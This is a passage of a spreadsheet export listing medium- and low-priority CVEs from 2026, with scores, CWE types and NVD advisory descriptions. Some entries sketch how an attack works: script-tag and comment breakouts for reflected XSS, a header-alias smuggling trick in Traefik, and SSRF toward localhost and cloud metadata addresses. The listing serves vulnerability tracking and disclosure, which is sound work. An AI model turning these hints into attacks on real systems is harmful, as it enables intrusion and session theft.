A malicious javascript: URL stored in a dashboard button could potentially result in client-side script execution in the MISP security context if the value reached a rendering or navigation path without the existing runtime validation. Such execution could allow an attacker to perform actions with the privileges of the affected user or access information available to their MISP session.
The practical exploitability of this issue is reduced by the fact that MISP already applied URL validation at render time, which neutralized known malicious values before they were presented to the user. The vulnerability therefore represents a persistence-layer validation gap and a defense-in-depth weakness rather than evidence of a direct bypass of the existing rendering protection.
The patch introduces a canonical url schema type and validates dashboard widget configuration before it is persisted through either settings save mechanism. ButtonWidget URLs must now be strings resolving to an absolute path on the current MISP instance or a full URL with the same origin. Values using javascript:, external origins, malformed URL forms, and non-string values are rejected at save time.</t>
        </is>
      </c>
      <c r="M2072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85230</t>
        </is>
      </c>
    </row>
    <row r="2073">
      <c r="A2073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85577</t>
        </is>
      </c>
      <c r="C2073" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2073" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2073" s="5" t="inlineStr"/>
      <c r="F2073" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2073" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2073" s="5" t="inlineStr"/>
      <c r="I2073" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2073" s="5" t="inlineStr"/>
      <c r="K2073" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2073" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in userLogin.php that allows unauthenticated attackers to inject arbitrary JavaScript by closing the script tag with &lt;/script&gt;. Attackers can craft a malicious URL with an error parameter containing script breakout sequences to execute arbitrary JavaScript in the victim's browser context on the login page.</t>
        </is>
      </c>
      <c r="M2073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85577</t>
        </is>
      </c>
    </row>
    <row r="2074">
      <c r="A2074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87859</t>
        </is>
      </c>
      <c r="C2074" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2074" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2074" s="5" t="inlineStr"/>
      <c r="F2074" s="5" t="inlineStr"/>
      <c r="G2074" s="5" t="inlineStr">
        <is>
          <t>apache, node.js</t>
        </is>
      </c>
      <c r="H2074" s="5" t="inlineStr"/>
      <c r="I2074" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2074" s="5" t="inlineStr"/>
      <c r="K2074" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="L2074" s="5" t="inlineStr">
        <is>
          <t>morgan is an HTTP request logger middleware for Node.js. In versions before 1.12.1, its escapeLogField() function does not escape the double quote character, which delimits the quoted fields of the Apache combined log format that morgan emits. An unauthenticated remote attacker who controls a value written to a quoted field, such as the User-Agent or Referer header, can include a double quote to close that field early, so a log consumer that parses the log by field position reads attacker-supplied text as the following field. In the built-in formats this makes the recorded value differ from the value that was sent, and in custom formats that quote an attacker-controlled token before a server-controlled one it can forge values such as the response status. No newline is injected, so record separation stays intact. The issue is fixed in morgan 1.12.1, which escapes the double quote. Users should upgrade to morgan 1.12.1 or later.</t>
        </is>
      </c>
      <c r="M2074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87859</t>
        </is>
      </c>
    </row>
    <row r="2075">
      <c r="A2075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88011</t>
        </is>
      </c>
      <c r="C2075" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2075" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2075" s="5" t="inlineStr"/>
      <c r="F2075" s="5" t="inlineStr"/>
      <c r="G2075" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H2075" s="5" t="inlineStr"/>
      <c r="I2075" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2075" s="5" t="inlineStr"/>
      <c r="K2075" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L2075"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M2075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88011</t>
        </is>
      </c>
    </row>
    <row r="2076">
      <c r="A2076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88046</t>
        </is>
      </c>
      <c r="C2076" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2076" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2076" s="5" t="inlineStr"/>
      <c r="F2076" s="5" t="inlineStr"/>
      <c r="G2076" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2076" s="5" t="inlineStr"/>
      <c r="I2076" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2076" s="5" t="inlineStr"/>
      <c r="K2076" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2076" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to 1.75.1, rclone core does not reject parent-directory segments in source Object.Remote() values before fs/list, fs/walk, fs/sync, and fs/operations pass those values to destination backends. A flat-keyspace source object store populated with native non-rclone tooling can contain a raw .. key segment, and affected b2, swift, qingstor, oracleobjectstorage, internetarchive, smb, storj, sftp, webdav, ftp, filelu, shade, and sia destinations use path.Join(root, remote) before EncodeDot can neutralize the segment. A copy or upload can therefore escape the configured root into another bucket, share, or path reachable by the victim credential, with sftp and smb potentially reaching other filesystem or share locations under the same login authority. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M2076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88046</t>
        </is>
      </c>
    </row>
    <row r="2077">
      <c r="A2077" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88057</t>
        </is>
      </c>
      <c r="C2077" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2077" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2077" s="5" t="inlineStr"/>
      <c r="F2077" s="5" t="inlineStr"/>
      <c r="G2077" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2077" s="5" t="inlineStr"/>
      <c r="I2077" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2077" s="5" t="inlineStr"/>
      <c r="K2077" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2077" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.28, 21.2.20, and 22.1.0, Angular's compiler and runtime in @angular/core and @angular/compiler could omit or select an incorrect sanitizer for security-sensitive directive host bindings because SecurityContext was derived from the declaring directive or component selector rather than the concrete host element. The mismatch is reachable through hostDirectives composition, inherited HostBinding declarations, createComponent with a custom hostElement or dynamic directives, SVG/MathML namespace elements, and tag-neutral selectors such as :not(...). Attacker-controlled href, src, action, xlink:href, or data values can therefore reach DOM attributes without Angular's built-in sanitizer and execute arbitrary JavaScript in the user's browser context. Applications unable to upgrade can use DomSanitizer.sanitize with SecurityContext.URL before assignment or restrict inputs to validated HTTP and HTTPS URL schemes. This issue is fixed in versions 20.3.28, 21.2.20, and 22.1.0.</t>
        </is>
      </c>
      <c r="M2077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88057</t>
        </is>
      </c>
    </row>
    <row r="2078">
      <c r="A2078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88879</t>
        </is>
      </c>
      <c r="C2078" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2078" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2078" s="5" t="inlineStr"/>
      <c r="F2078" s="5" t="inlineStr"/>
      <c r="G2078" s="5" t="inlineStr">
        <is>
          <t>sap, nginx</t>
        </is>
      </c>
      <c r="H2078" s="5" t="inlineStr"/>
      <c r="I2078" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2078" s="5" t="inlineStr"/>
      <c r="K2078" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L2078" s="5" t="inlineStr">
        <is>
          <t>Traefik is an HTTP reverse proxy and load balancer. In Traefik v1.x, v2.x through v2.11.55, and v3.0.0 through v3.7.11, header names are canonicalized only on dashes, so X-Auth-User, X_Auth_User and X.Auth.User are treated as three distinct headers by Traefik, while backends that derive variable names from header names (CGI, WSGI, PHP, NGINX and others) collapse them into a single variable. A client can therefore smuggle a dot-form alias of a header that Traefik manages past the middleware managing it — for example supplying X.Authenticated.User alongside the canonical X-Authenticated-User written by the ForwardAuth middleware — causing such a backend to read the client-supplied value instead of the identity Traefik asserted. In the tested configuration (PHP 8.2 built-in SAPI over an HTTP/1 backend path), Go's lexical header ordering makes the attacker-supplied value win deterministically, so a client that ForwardAuth admits as a low-privilege identity can be treated by the backend as a different user or role. Any header Traefik sets is affected, not only ForwardAuth's. This is an incomplete fix for GHSA-x677-9fxg-v5c5, which blocked only the underscore form. Fixed in v2.11.56 and v3.7.12, which add the aliasHeadersStrategy entry-point option; because it defaults to 'keep' for backwards compatibility, it must be explicitly set to 'delete' or 'reject' for the fix to take effect. Unmaintained release lines will not receive a patch.</t>
        </is>
      </c>
      <c r="M2078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88879</t>
        </is>
      </c>
    </row>
    <row r="2079">
      <c r="A2079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88892</t>
        </is>
      </c>
      <c r="C2079" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2079" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2079" s="5" t="inlineStr"/>
      <c r="F2079" s="5" t="inlineStr"/>
      <c r="G2079" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2079" s="5" t="inlineStr"/>
      <c r="I2079" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2079" s="5" t="inlineStr"/>
      <c r="K2079" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2079" s="5" t="inlineStr">
        <is>
          <t>OpenPanel is an analytics platform. In all versions (no patched release available at time of publication), the data importer fetches a caller-supplied URL with plain fetch instead of the project's existing SSRF guard (apps/api/src/utils/safe-fetch.ts). In packages/importer/src/providers/umami.ts, parseRemoteFile calls fetch() on config.fileUrl, which is validated only by z.string().url(), so values such as http://127.0.0.1:9911/ or http://169.254.169.254/latest/meta-data/ are accepted; the shared createFileImportConfig factory gives the plausible provider the same field. An authenticated organization member — including a default 'member' with no project_access rows, for whom the intended access-level check is skipped because getProjectAccess returns boolean true rather than a level object — can therefore make the server connect to any address reachable from it. The resulting HTTP status and status text are persisted as Import.errorMessage and returned by import.get to the same user, providing a scanning oracle for internal hosts, ports and paths; if an internal response parses as Umami CSV, its rows are ingested as events and become readable in the attacker's analytics views.</t>
        </is>
      </c>
      <c r="M2079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88892</t>
        </is>
      </c>
    </row>
    <row r="2080">
      <c r="A2080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89239</t>
        </is>
      </c>
      <c r="C2080" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2080" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2080" s="5" t="inlineStr"/>
      <c r="F2080" s="5" t="inlineStr"/>
      <c r="G2080" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2080" s="5" t="inlineStr"/>
      <c r="I2080" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2080" s="5" t="inlineStr"/>
      <c r="K2080" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2080" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in the showAlertMessage() function that inserts the raw Referer header into a JavaScript comment without encoding. Attackers can craft a Referer header containing */ to close the comment and inject arbitrary JavaScript that executes in the site origin for visitors arriving from the attacker-controlled page.</t>
        </is>
      </c>
      <c r="M2080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89239</t>
        </is>
      </c>
    </row>
    <row r="2081">
      <c r="A2081" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89240</t>
        </is>
      </c>
      <c r="C2081" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2081" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2081" s="5" t="inlineStr"/>
      <c r="F2081" s="5" t="inlineStr"/>
      <c r="G2081" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2081" s="5" t="inlineStr"/>
      <c r="I2081" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2081" s="5" t="inlineStr"/>
      <c r="K2081" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2081" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in plugin/Live/confirmLivePassword.php. The script interpolates the unauthenticated GET parameter u (which is not covered by $securityFilter) directly into an &lt;img src="..."&gt; attribute without URL- or HTML-encoding. A remote attacker can craft a link containing a double-quote character in u (with a non-empty key parameter and no valid c parameter) to close the src attribute and inject an additional tag with an onerror handler, executing arbitrary JavaScript in the site's origin in the browser of any user, including an administrator, who opens the link. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="M2081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89240</t>
        </is>
      </c>
    </row>
    <row r="2082">
      <c r="A2082" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9338</t>
        </is>
      </c>
      <c r="C2082" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2082" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2082" s="5" t="inlineStr"/>
      <c r="F2082" s="5" t="inlineStr"/>
      <c r="G2082" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H2082" s="5" t="inlineStr"/>
      <c r="I2082" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2082" s="5" t="inlineStr"/>
      <c r="K2082" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2082" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to trigger excessive resource consumption, potentially leading to reduced availability of the affected service.</t>
        </is>
      </c>
      <c r="M2082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9338</t>
        </is>
      </c>
    </row>
    <row r="2083">
      <c r="A2083" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9667</t>
        </is>
      </c>
      <c r="C2083" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2083" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2083" s="5" t="inlineStr"/>
      <c r="F2083" s="5" t="inlineStr"/>
      <c r="G2083" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H2083" s="5" t="inlineStr"/>
      <c r="I2083" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2083" s="5" t="inlineStr"/>
      <c r="K2083" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2083" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to server-side request forgery (SSRF) that could allow a remote, unauthenticated attacker to cause the server to send outbound requests to arbitrary endpoints.</t>
        </is>
      </c>
      <c r="M2083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9667</t>
        </is>
      </c>
    </row>
    <row r="2084">
      <c r="A2084" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2084" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-7062</t>
        </is>
      </c>
      <c r="C2084" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D2084" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2084" s="5" t="inlineStr"/>
      <c r="F2084" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2084" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2084" s="5" t="inlineStr"/>
      <c r="I2084" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2084" s="5" t="inlineStr"/>
      <c r="K2084" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="L2084" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) vulnerability has been identified in the H5P module `h5p-nodejs-library` by Lumi Education UG in versions up to and including 10.0.4. The library allows users to upload H5P content that contains malicious JavaScript. This code is then executed in the browsers of other users who view the affected H5P content.</t>
        </is>
      </c>
      <c r="M2084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-7062</t>
        </is>
      </c>
    </row>
    <row r="2085">
      <c r="A2085" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0297</t>
        </is>
      </c>
      <c r="C2085" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D2085" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2085" s="5" t="inlineStr"/>
      <c r="F2085" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2085" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H2085" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:globalprotect</t>
        </is>
      </c>
      <c r="I2085" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2085" s="5" t="inlineStr"/>
      <c r="K2085" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2085" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow vulnerability exists in the Palo Alto Networks GlobalProtect™ app that enables a man-in-the-middle (MitM) attacker or a rogue gateway to disrupt system processes and potentially execute arbitrary code with elevated privileges (SYSTEM privileges on Windows, and root privileges on macOS and Linux).</t>
        </is>
      </c>
      <c r="M2085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0297</t>
        </is>
      </c>
    </row>
    <row r="2086">
      <c r="A2086" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0298</t>
        </is>
      </c>
      <c r="C2086" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D2086" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2086" s="5" t="inlineStr"/>
      <c r="F2086" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2086" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H2086" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:globalprotect</t>
        </is>
      </c>
      <c r="I2086" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2086" s="5" t="inlineStr"/>
      <c r="K2086" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2086" s="5" t="inlineStr">
        <is>
          <t>An improper input validation vulnerability exists in the Windows Pre-Logon Access Provider (PLAP) component of the Palo Alto Networks GlobalProtect™ app on Windows devices which enables a man-in-the-middle (MitM) attacker to execute arbitrary code with SYSTEM privileges on an affected client.
The GlobalProtect app on Linux, macOS, iOS, Android, and Chrome OS  is not affected.</t>
        </is>
      </c>
      <c r="M2086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0298</t>
        </is>
      </c>
    </row>
    <row r="2087">
      <c r="A2087" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2087" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71404</t>
        </is>
      </c>
      <c r="C2087" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2087" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2087" s="5" t="inlineStr"/>
      <c r="F2087" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2087" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2087" s="5" t="inlineStr"/>
      <c r="I2087" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J2087" s="5" t="inlineStr"/>
      <c r="K2087" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2087" s="5" t="inlineStr">
        <is>
          <t>better-auth versions after v0.0.2 and before 1.1.16 contain a reflected cross-site scripting (XSS) vulnerability on the /api/auth/error page, where the value of the 'error' URL parameter is reflected as HTML without proper neutralization. An attacker who coerces a user into visiting a specially-crafted URL can execute arbitrary JavaScript in the context of the user's browser. The issue is fixed in version 1.1.16.</t>
        </is>
      </c>
      <c r="M2087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71404</t>
        </is>
      </c>
    </row>
    <row r="2088">
      <c r="A2088" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40507</t>
        </is>
      </c>
      <c r="C2088" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2088" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2088" s="5" t="inlineStr"/>
      <c r="F2088" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2088" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2088" s="5" t="inlineStr"/>
      <c r="I2088" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2088" s="5" t="inlineStr"/>
      <c r="K2088" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2088" s="5" t="inlineStr">
        <is>
          <t>OpenEMR before 8.3.0 contains a reflected cross-site scripting vulnerability in the patient portal template import handler. The templateHtml GET parameter is reflected into the page response without sanitization. An attacker can craft a URL that executes arbitrary JavaScript in the browser of any authenticated user with Forms Administration permissions who visits the link, enabling session hijacking.</t>
        </is>
      </c>
      <c r="M2088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40507</t>
        </is>
      </c>
    </row>
    <row r="2089">
      <c r="A2089" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40508</t>
        </is>
      </c>
      <c r="C2089" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2089" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2089" s="5" t="inlineStr"/>
      <c r="F2089" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2089" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2089" s="5" t="inlineStr"/>
      <c r="I2089" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2089" s="5" t="inlineStr"/>
      <c r="K2089" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2089" s="5" t="inlineStr">
        <is>
          <t>OpenEMR before 8.3.0 contains a stored cross-site scripting vulnerability in the patient portal template import handler that allows authenticated attackers with Forms Administration permissions to upload template files containing arbitrary HTML or JavaScript. Attackers can inject malicious scripts through the template upload functionality, which are stored without sanitization and execute in the browser of any other Forms Administration user who views the template in the HTML editor.</t>
        </is>
      </c>
      <c r="M2089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40508</t>
        </is>
      </c>
    </row>
    <row r="2090">
      <c r="A2090" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48550</t>
        </is>
      </c>
      <c r="C2090" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2090" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2090" s="5" t="inlineStr"/>
      <c r="F2090" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2090" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2090" s="5" t="inlineStr"/>
      <c r="I2090" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2090" s="5" t="inlineStr"/>
      <c r="K2090" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2090" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.14 and Nagios XI before 2026R1.7 are vulnerable to reflected cross-site scripting in cmd.cgi via the NagFormId parameter. An unauthenticated remote attacker can craft a malicious link that, when followed by an authenticated user, executes arbitrary JavaScript in the victim's browser.</t>
        </is>
      </c>
      <c r="M2090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48550</t>
        </is>
      </c>
    </row>
    <row r="2091">
      <c r="A2091" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48552</t>
        </is>
      </c>
      <c r="C2091" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2091" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2091" s="5" t="inlineStr"/>
      <c r="F2091" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2091" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2091" s="5" t="inlineStr"/>
      <c r="I2091" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2091" s="5" t="inlineStr"/>
      <c r="K2091" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2091" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.14 and Nagios XI before 2026R1.7 are vulnerable to DOM-based cross-site scripting in jsonquery.js. Unencoded JSON string values reflected from stored fields are inserted into the DOM without sanitization, allowing attackers to run arbitrary JavaScript in the victim's browser.</t>
        </is>
      </c>
